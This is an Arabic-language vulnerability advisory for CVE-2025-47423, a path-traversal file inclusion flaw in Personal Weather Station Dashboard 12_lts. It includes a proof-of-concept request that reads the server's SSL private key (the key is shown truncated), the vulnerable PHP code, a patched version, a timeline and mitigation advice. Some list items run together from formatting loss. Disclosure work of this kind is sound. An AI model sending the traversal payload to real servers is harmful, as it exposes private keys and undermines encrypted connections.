
الإفصاح المفصل عن CVE-2025-47423: تضمين الملفات المحلية في لوحة إدارة محطة الطقس الشخصية 12_lts. يتضمن إثبات المفهوم (PoC)، تحليل الكود القابل للاستغلال، وتوصيات الإصلاح الآمن للتعلم الدفاعي.
اكتشفه: Matthew Eagle
الحالة: إفصاح عام
تاريخ الإبلاغ: 2025-05-05
معرف CVE: CVE-2025-47423
ثغرة تضمين الملفات المحلي (LFI) في إصدار 12_lts من لوحة تحكم محطة الطقس الشخصية تسمح للمهاجمين غير الموثقين بقراءة ملفات عشوائية على الخادم. استغلال هذه الثغرة يمنح الوصول إلى ملفات حساسة بما في ذلك مفاتيح SSL الخاصة، مما قد يضر بسرية وسلامة اتصالات HTTPS.
/others/_test.phptest (عبر GET)تسمح هذه الثغرة للمهاجمين عن بعد بـ:
server.key)CVSS: 5.8 متوسط
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: www.example.com
الرد:
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAs2omMqKSB+lm7xu9Nu3C5...
...TRUNCATED...
-----END RSA PRIVATE KEY-----
$script = trim($_GET['test']);
$script = str_replace('../','',$script);
include($script);
إن str_replace غير كافٍ لمنع اجتياز الدليل.
basename() والتحقق من الملفات المسموح بها$allowed_tests = ['index.php', 'module_test.php'];
$script = isset($_GET['test']) ? basename($_GET['test']) : 'index.php';
if (!in_array($script, $allowed_tests)) {
die("Invalid test file.");
}
include(__DIR__ . '/scripts/' . $script);
| التاريخ | الحدث |
|---|---|
| 2025-05-05 | تم الإبلاغ عن الثغرة لمشرفي PWS Dashboard |
| 2025-05-06 | تم التأكيد وبدء الاختبارات |
| 2025-05-07 | تم حجز CVE-2025-47423 عبر MITRE |
| قيد الانتظار | التصحيح العام وإدراج CVE معلق |
إذا كنت تستخدم Personal Weather Station Dashboard 12_lts، فيجب عليك:
_test.php فورًاتم اكتشاف الثغرة والإفصاح عنها بمسؤولية بواسطة Matthew Eagle
جهة الاتصال: [email protected]
تم تنسيق الإفصاح وفقًا لإرشادات الإفصاح المسؤول. تم إصدار هذا المستند لأغراض تعليمية ودفاعية.